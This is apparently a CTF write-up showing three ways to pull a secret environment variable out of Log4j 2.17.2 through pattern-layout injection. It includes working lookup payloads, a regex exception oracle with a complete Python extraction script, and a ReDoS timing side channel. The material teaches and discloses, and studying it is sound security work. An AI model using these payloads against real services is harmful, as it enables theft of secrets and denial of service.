This blog post explains three ways to exploit Log4j 2.17.2 from Google CTF 2022:
- Level 1: Trigger an exception in Log4j that contains the flag
- Level 2: Guessing the flag with the help of RegEx conversion patterns
- Bonus: Guessing the flag with a time-based side channel using ReDoS
The bonus was not necessary to solve the challenge but fun to code ;)
There is a chatbot interface at https://log4j-web.2022.ctfcompetition.com/
When looking into the source code, we see the following:
- Python 3.8.10 running a Flask web server in the frontend
- Java 11.0.15 in the backend with Log4j 2.17.2
- In this version JNDI lookups are disabled by default and Log4Shell is not exploitable
- A Dockerfile with nsjail process isolation wiring the two
- The process isolation is just for hosting the CTF and not relevant for the challenge
- We identified the versions by running the Docker container and looking into
pom.xml
$ tree -L 2
.
├── chatbot
│ ├── pom.xml
│ └── src
├── server
│ ├── app.py
│ ├── requirements.txt
│ └── templates
├── Dockerfile
├── kctf
├── nsjail.cfg
└── start.sh
@app.route("/", methods=['GET', 'POST'])
def start():
if request.method == 'POST':
text = request.form['text'].split(' ')
cmd = ''
if len(text) < 1:
return ('invalid message', 400)
elif len(text) < 2:
cmd = text[0]
text = ''
else:
cmd, text = text[0], ' '.join(text[1:])
result = chat(cmd, text)
return result
return render_template('index.html')
GET /
will serve theindex.html
and show the interfacePOST /
withtext
payload will be split by spaces- The first part is interpreted as the
cmd
- The remaining parts are the arguments
text
- Next, these are passed on to
chat(cmd, text)
- The first part is interpreted as the
The backend is called by starting a Java process like so:
def chat(cmd, text):
# run java jar with a 10 second timeout
res = subprocess.run(['java', '-jar', \
'-Dcmd=' + cmd, \
'chatbot/target/app-1.0-SNAPSHOT.jar', \
'--', text], \
capture_output=True, timeout=10)
print(res.stderr.decode('utf8'))
return res.stdout.decode('utf-8')
We note the following:
- The process is called properly (no
shell=True
, arguments are passed as a list) - The
cmd
is passed as a system property to Java - All the
text
is passed as one single argument (may contain spaces) stderr
is printed to the console (and not visible in the frontend)stdout
is returned (and shown in the frontend)
public static void main(String[]args) {
String flag = System.getenv("FLAG");
if (flag == null || !flag.startsWith("CTF")) {
LOGGER.error("{}", "Contact admin");
}
LOGGER.info("msg: {}", args);
// TODO: implement bot commands
String cmd = System.getProperty("cmd");
if (cmd.equals("help")) {
doHelp();
return;
}
if (!cmd.startsWith("/")) {
System.out.println("The command should start with a /.");
return;
}
doCommand(cmd.substring(1), args);
}
We note the following:
- The flag is hidden in the environment variable
FLAG
- The
LOGGER.info
call is the only one calling Log4j!- It will print the full arguments, but not the command
- The way that arguments are passed from Python, there will only ever by zero or one argument. But, this argument may contain spaces.
- The command is fetched from the system property
cmd
- Commands must start with a
/
- except forhelp
- Next, the command and the arguments are passed to
doCommand(cmd.substring(1), args)
private static void doCommand(String cmd, String[] args) {
switch(cmd) {
case "help":
doHelp();
break;
case "repeat":
System.out.println(args[1]);
break;
case "time":
DateTimeFormatter dtf = DateTimeFormatter.ofPattern("yyyy/M/d H:m:s");
System.out.println(dtf.format(LocalDateTime.now()));
break;
case "wc":
if (args[1].isEmpty()) {
System.out.println(0);
} else {
System.out.println(args[1].split(" ").length);
}
break;
default:
System.out.println("Sorry, you must be a premium member in order to run this command.");
}
}
We finally see the available commands:
help
or/help
just prints a help message/repeat
will print the first (and only) argument tostdout
/time
will print the current time/wc
will print the number of arguments passed
None of these will invoke Log4j! So, we can't inject anything via the arguments!
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="INFO">
<Appenders>
<Console name="Console" target="SYSTEM_ERR">
<PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
</PatternLayout>
</Console>
</Appenders>
<Loggers>
<Root level="debug">
<AppenderRef ref="Console"/>
</Root>
</Loggers>
</Configuration>
This configures how Log4j will behave:
- Logs are written to
stderr
(remember, we don't collect that in the Python frontend) - The system properties lookup
${sys:cmd}
prints thecmd
property in every log line - Afterwards,
%msg
holds the message, followed by a line break%n
Our cmd
is passed as-is to the Java process and injected into the pattern layout:
%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n
Log4j still has environment lookups which could enable us to read the flag via ${env:FLAG}
.
A first try would be to inject this in the cmd
command.
This will print the FLAG
to stderr
on the backend, but sadly this is not captured by the frontend.
09:10:12.598 INFO com.google.app.App executing CTF{1234} - msg: --
We may also inject new conversion patterns
and trigger exceptions that will be logged to stdout
.
Let's give the invalid %oops
pattern a try:
Log4j will resolve patterns recursively so that we can combine conversion patterns and environment lookups. This will also trigger an exception, but the exception does not leak the resolved environment lookup. Yet.
We now know what we want to look out for:
- A lookup or combination of lookups that triggers an exception
- The exception must leak parts of its arguments
Luckily, Log4j has plenty of lookups and conversion patterns available for us.
Digging deeper into the source code of Log4j, we find the Java lookup that does things like ${java:version}
.
However, if we give it any other key, we will get an IllegalArgumentException
that leaks the argument.
@Override
public String lookup(final LogEvent event, final String key) {
switch (key) {
case "version":
return "Java version " + getSystemProperty("java.version");
case "runtime":
return getRuntime();
case "vm":
return getVirtualMachine();
case "os":
return getOperatingSystem();
case "hw":
return getHardware();
case "locale":
return getLocale();
default:
throw new IllegalArgumentException(key);
}
}
So, let's give this one a try then:
${java:${env:FLAG}}
Awesome, we got the flag CTF{d95528534d14dc6eb6aeb81c994ce8bd}
There is another chatbot interface at https://log4j2-web.2022.ctfcompetition.com/
This is the second level to the challenge where the authors only tell us that the code has been changed slightly.
Probably, they catch exceptions or even avoid printing out the FLAG
when it is seen in stdout
.
We need an attack vector that can guess the flag without printing it.
For example, we would like to ask questions like "does it the flag start with CTF{a
?".
And we need a way to differentiate a "yes" from a "no" to this question.
With that, we could guess the full flag character-by-character.
Log4j doesn't have any conversion patterns or lookups that let us do a "string contains" or "string starts with". But, Log4j allows for RegEx substitution with the following pattern:
%replace{pattern}{regex}{substitution}
Consider this input now:
%replace{${env:FLAG}}{^CTX.*}{${error}}
This will yield The command should start with a /.
- Why? Before the RegEx will be evaluated,
${env:FLAG}
will be replaced with the flag. Then, the RegEx pattern will be tested on the flag and not match because the flag does not start withCTX
. Nothing will be replaced by this pattern, only the actual flag will be printed tostderr
as before (but, we don't see it). Since the command does not start with a/
the app will tell me so.
Now consider this input:
%replace{${env:FLAG}}{^CTF.*}{${error}}
This will yield Sensitive information detected in output. Censored for security reasons.
- Why? The pattern does match now (because the flag starts with
CTF
) so the entire flag is replaced by${error}
. The term${error}
is a back-reference to a named capturing group and NOT a Log4j lookup. This named capturing group does not exist and so our RegEx will throw an exception. We know that exceptions are silenced and replaced with the the "sensitive information" text.
The actual exception that we trigger in the backend looks like this:
2022-07-08 12:57:32,788 main ERROR An exception occurred processing Appender Console java.lang.IllegalArgumentException: No group with name {error}
at java.util.regex.Matcher.appendReplacement(Matcher.java:849)
at java.util.regex.Matcher.replaceAll(Matcher.java:955)
at org.apache.logging.log4j.core.pattern.RegexReplacementConverter.format(RegexReplacementConverter.java:95)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:44)
...
We can use this to binary-search for the flag:
We use the ASCII notation to easily search the entire printable ASCII space.
The following snippet is looking for \x43\x54\x46
(CTF) followed by [\x61-\x71]
(a-z).
This also makes it easy to search for special characters without caring about escaping them.
%replace{${env:FLAG}}{^\x43\x54\x46[\x61-\x71]}{${error}}
Find the full algorithm below.
import requests
def int2hex(num):
# transforms 65 to '\x41'
return f"\\x{num:02x}"
def str2hex(text):
# transforms 'hello' to '\x68\x65\x6c\x6c\x6f'
return "".join(map(int2hex, map(ord, text)))
def get_regex(prefix, lo, hi):
check = "[" + int2hex(lo) + "-" + int2hex(hi) + "]"
return "%replace{${env:FLAG}}{^" + str2hex(prefix) + check + "}{${error}}"
def test_pattern(pattern, endpoint):
# triggers an exception if the regex pattern matches
response = requests.post(endpoint, data=dict(text=pattern))
return "ERROR" in response.text or "Censored" in response.text
def binary_search(prefix, lo, hi, test_range):
# binary search with minimum number of comparisons
while lo != hi:
mid = (lo + hi) // 2
if test_range(prefix, lo, mid):
hi = mid
else:
lo = mid + 1
if test_range(prefix, lo, lo):
return lo
return None
def solve(endpoint):
def test_range(prefix, lo, hi):
print(f" => {prefix} [{chr(lo)}-{chr(hi)}]", end="\r")
pattern = get_regex(prefix, lo, hi)
return test_pattern(pattern, endpoint)
flag = "CTF"
while True:
# search the all printable ascii characters
match = binary_search(flag, 0x20, 0x7E, test_range)
if not match:
return
flag += chr(match)
solve("https://log4j2-web.2022.ctfcompetition.com/")
# CTF{and-you-thought-it-was-over-didnt-you}
Did you look closely at the Python source code?
def chat(cmd, text):
# run java jar with a 10 second timeout
res = subprocess.run(['...'], capture_output=True, timeout=10)
You might think it's just good practice to have a timeout here. But I see a new attack vector arising from that: With RegEx, one can craft quite complex patterns or inputs that will never finish to evaluate because of exponential backtracking.
In level 2, we found an expression that returns different outputs, when asked if the flag starts with a certain substring. But, there is one additional "output" available: the response time.
Try the following input on the chatbot (without the line breaks):
%replace{
hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichh
ccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcc
hichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcc
cchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhic
chicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihic
ichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}
{(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*}
{match}
You won't get an answer. This pattern and input will never finish on any JDK. We took it from the SonarLint rule RSPEC-2631. While this is often just seen as a DoS attack vector, it may also be used to extract data.
Consider the following input:
%replace{${env:FLAG}.
hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichh
ccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcc
hichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcc
cchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhic
chicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihic
ichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}
{(CTF[a-z].*|(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*)}
{match}
For the input, we prepended the flag.
For the pattern, we use an optional, where the first option is CTF[a-z].*
and the second option is the one that will timeout.
If the flag starts with CTF[a-z]
this pattern will match immediately.
The first optional will match and there is no need for the RegEx engine to try the second one.
However, if the flag does not start with CTF[a-z]
the second optional will be evaluated.
And this second one will timeout then.
Thus, judging by the response time alone, we can test for any flag prefix.
Replace the get_regex
and test_pattern
methods from before with the following:
def get_regex(prefix, lo, hi):
check = "[" + int2hex(lo) + "-" + int2hex(hi) + "]"
# https://rules.sonarsource.com/java/RSPEC-2631
return (
"%replace{${env:FLAG}."
"hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchicchhcihchcihiihciichh"
"ccciccichcichiihcchcihhicchcciicchcccihiiihhihihihichicihhcciccchihhhcc"
"hichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccchchhhhiiihchihcc"
"cchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihhichiccchhic"
"chicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihihiihhihihihic"
"ichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci}"
"{(" + str2hex(prefix) + check + ".*|"
"(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*)}{MATCH}"
)
def test_pattern(pattern, endpoint):
# only times out if the regex pattern does not match
response = requests.post(endpoint, data=dict(text=pattern))
return response.ok
Because of the timeout in the Python code, we may either get an immediate response or a 500 server error if the RegEx does not match. While this method takes much longer, it doesn't rely on any output whatsoever, which makes it quite dangerous.
And this is why you should not put secrets in your environment variables.